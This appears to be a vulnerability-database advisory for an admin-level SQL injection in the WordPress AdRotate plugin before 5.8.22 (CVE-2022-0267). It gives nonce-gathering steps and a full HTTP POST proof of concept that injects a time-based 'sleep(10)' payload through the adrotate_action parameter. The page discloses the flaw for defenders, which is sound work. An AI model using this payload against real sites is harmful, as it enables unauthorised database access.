Lucene search
JrXnmWPEX-ID:7DF70F49-547F-4BDB-BF9B-2E06F93488C6HistoryFeb 07, 2022 - 12:00 a.m.
AdRotate < 5.8.22 - Admin+ SQL Injection
2022-02-0700:00:00
JrXnm
112
adrotate
sql injection
admin+nonce
bulk action
exploit
EPSS
0.001
Percentile
37.7%
The plugin does not sanitise and escape the adrotate_action before using it in a SQL statement via the adrotate_request_action function available to admins, leading to a SQL injection
Get the nonce from one of the bulk action, for example /wp-admin/admin.php?page=adrotate and look for adrotate_nonce in the source
POST /wp-admin/ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 107
Connection: close
Cookie: [admin+]
adrotate_action_submit=1&adrotate_nonce=07d896329d&adrotate_action=renew-1 where sleep(10)#&bannercheck[]=1Related
nvd
nvd
CVE-2022-0267
2022-03-07 09:15:09
prion
prion
Sql injection
2022-03-07 09:15:00
cnvd
cnvd
WordPress AdRotate Plugin SQL注入漏洞
2022-03-09 00:00:00
cve
cve
CVE-2022-0267
2022-03-07 09:15:09
cvelist
cvelist
CVE-2022-0267 AdRotate < 5.8.22 - Admin+ SQL Injection
2022-03-07 08:16:24
wpvulndb
wpvulndb
AdRotate < 5.8.22 - Admin+ SQL Injection
2022-02-07 00:00:00